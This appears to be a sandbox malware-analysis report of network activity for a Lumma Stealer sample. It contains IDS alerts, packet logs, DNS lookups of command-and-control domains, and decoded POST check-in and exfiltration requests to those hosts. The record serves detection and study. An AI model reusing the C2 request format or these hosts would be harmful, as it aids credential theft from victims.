2025-01-05T17:54:15.895405+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.406362+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.894231+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.894231+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:18.182604+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:19.620755+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:20.186521+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49752 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:21.248372+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:24.192636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:25.189162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:27.191854+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:27.196515+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49756 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:29.571028+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:30.024044+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49757 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:30.792272+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 17:54:14.893980026 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:14.894033909 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:14.894123077 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:14.919873953 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:14.919894934 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.383903980 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.384083033 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.389684916 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.389700890 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.390027046 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.435501099 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.476110935 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.476111889 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.476351023 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.895081997 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.895226002 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.895292044 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.915968895 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.915998936 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.916014910 CET | 49748 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.916022062 CET | 443 | 49748 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.937647104 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.937704086 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:15.937935114 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.938072920 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:15.938087940 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.406158924 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.406362057 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.407670021 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.407676935 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.407892942 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.409280062 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.409303904 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.409332991 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894191027 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894542933 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894575119 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894582033 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.894594908 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894628048 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894639969 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.894645929 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894669056 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894675970 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.894680977 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.894720078 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.894725084 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.895250082 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.895275116 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.895288944 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.895294905 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.895332098 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.898818970 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.951343060 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.982686043 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.982743025 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.982767105 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.982774973 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.982784986 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
Jan 5, 2025 17:54:16.982822895 CET | 49749 | 443 | 192.168.2.4 | 104.21.90.109
Jan 5, 2025 17:54:16.982829094 CET | 443 | 49749 | 104.21.90.109 | 192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.016793013 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.016884089 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096090078 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096090078 CET49749443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.096117020 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.096127033 CET44349749104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.701242924 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701318979 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:17.701392889 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701703072 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:17.701719046 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.182533026 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.182604074 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.184511900 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.184526920 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.184782982 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.186382055 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186558962 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186597109 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.186652899 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.186660051 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882344961 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882457018 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:18.882555008 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.883014917 CET49750443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:18.883038998 CET44349750104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.160696983 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.160742998 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.160907984 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.161237001 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.161254883 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.620666027 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.620754957 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.622874975 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.622885942 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.623117924 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:19.624711037 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.624886036 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:19.624913931 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186530113 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186631918 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.186822891 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.235737085 CET49752443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.235758066 CET44349752104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.770231009 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770270109 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:20.770334005 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770787954 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:20.770800114 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.248292923 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.248372078 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.249804020 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.249815941 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.250050068 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.251503944 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251641035 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251677990 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.251748085 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.251756907 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.875569105 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.875675917 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:21.876522064 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.876728058 CET49753443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:21.876754999 CET44349753104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:23.707118988 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707173109 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:23.707235098 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707560062 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:23.707571030 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.192543030 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.192636013 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.194039106 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.194051981 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.194283962 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.195483923 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.195632935 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.195660114 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648323059 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648406029 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.648452044 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.648727894 CET49754443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.648740053 CET44349754104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.732935905 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.732980967 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:24.733042955 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.733374119 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:24.733391047 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.189068079 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.189162016 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.190638065 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.190654039 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.190931082 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.192174911 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.192260027 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.192265034 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688070059 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688174009 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:25.688239098 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.691570044 CET49755443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:25.691587925 CET44349755104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:26.719917059 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720019102 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:26.720104933 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720499992 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:26.720539093 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.191672087 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.191854000 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.193232059 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.193253040 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.193497896 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.194920063 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195748091 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195800066 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.195904970 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.195950031 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196369886 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196424961 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196559906 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196602106 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196758032 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196798086 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.196954012 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.196985960 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197005987 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197022915 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197161913 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197190046 CET44349756104.21.90.109192.168.2.4
                                                                                                                                                    Jan 5, 2025 17:54:27.197218895 CET49756443192.168.2.4104.21.90.109
                                                                                                                                                    Jan 5, 2025 17:54:27.197429895 CET49756443192.168.2.4104.21.90.109
Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Jan 5, 2025 17:54:14.876308918 CET | 54896       | 53        | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 17:54:14.888458967 CET | 53          | 54896     | 1.1.1.1     | 192.168.2.4
Jan 5, 2025 17:54:30.027750015 CET | 54948       | 53        | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 17:54:30.139241934 CET | 53          | 54948     | 1.1.1.1     | 192.168.2.4
Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name               | Type           | Class       | DNS over HTTPS
Jan 5, 2025 17:54:14.876308918 CET | 192.168.2.4 | 1.1.1.1 | 0xc49e   | Standard query (0) | sloppymisskr.click | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:54:30.027750015 CET | 192.168.2.4 | 1.1.1.1 | 0x967a   | Standard query (0) | cegu.shop          | A (IP address) | IN (0x0001) | false
Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name               | CName | Address        | Type           | Class       | DNS over HTTPS
Jan 5, 2025 17:54:14.888458967 CET | 1.1.1.1   | 192.168.2.4 | 0xc49e   | No error (0) | sloppymisskr.click |       | 104.21.90.109  | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:54:14.888458967 CET | 1.1.1.1   | 192.168.2.4 | 0xc49e   | No error (0) | sloppymisskr.click |       | 172.67.199.223 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:54:30.139241934 CET | 1.1.1.1   | 192.168.2.4 | 0x967a   | No error (0) | cegu.shop          |       | 185.161.251.21 | A (IP address) | IN (0x0001) | false
                                                                                                                                                    • sloppymisskr.click
                                                                                                                                                    • cegu.shop
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.4 | 49748       | 104.21.90.109  | 443              | 6860 | C:\Users\user\Desktop\Setup.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:15 UTC | 265 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sloppymisskr.click
2025-01-05 16:54:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2025-01-05 16:54:15 UTC | 1137 | IN | HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 16:54:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=k86vjn7fl9j2lgnkaknp2ngu28; expires=Thu, 01 May 2025 10:40:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yrciEEi4C1QB%2FnHRkH6%2BxLbgSsoEhAvxu%2FUJy8tMblmJ%2FBAphUtvc7nv5WH%2F0HnHCRaxj5jCGdF30WP9DVZJ6%2Bya3%2BrawQKFbjTxA%2BHbbeUH3sKhOsD5BroANB6hZtXeUizthLk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd4fd3b1dbc424d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2001&rtt_var=793&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1343764&cwnd=208&unsent_bytes=0&cid=b9cd748ffaae8c68&ts=522&x=0"
2025-01-05 16:54:15 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2025-01-05 16:54:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.4 | 49749       | 104.21.90.109  | 443              | 6860 | C:\Users\user\Desktop\Setup.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:16 UTC | 266 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 78
    Host: sloppymisskr.click
2025-01-05 16:54:16 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
    Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2025-01-05 16:54:16 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 16:54:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=ohk87q5en89qk952meguko8p39; expires=Thu, 01 May 2025 10:40:55 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjua7bP2kQxFBxr58QubEpAB%2BUkLvsXjozGWbajv87sauAeNShxv89lRdkECI8hp8AfHzQScNPvX8Kgg0WwuS%2Bgt65HEAhUmLPMoWmhDqIay4eIeC6ew5A7J3vVOnPeESnkXVW0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd4fd411ad35e73-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1625&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=980&delivery_rate=1796923&cwnd=201&unsent_bytes=0&cid=bdf0d06eacc1fc99&ts=494&x=0"
                                                                                                                                                    Data Ascii: 2ViANPS/5/P8VX6LIScxs56DCEv8MX9tg1fBfcgG0KvxWWEZsKez4uyNKr4Fw5AvulYtC+VsIojfV6V9yarpj6Q0RECY6+aqCbhy0hhaaGfuRglXoXUrFb5/hDy1E9SqgVgZGc3mwqrkxHPSWHIF5q8jcAOECHqJv1b5NZBPoKrZWRwU5OPjpqyMbkvhpwCH+iJ1swEsd73+C91M/UPRk6QBASGslvrKEYBTs+QCaNLjHzGf9Qgnlb4SrODBe/H
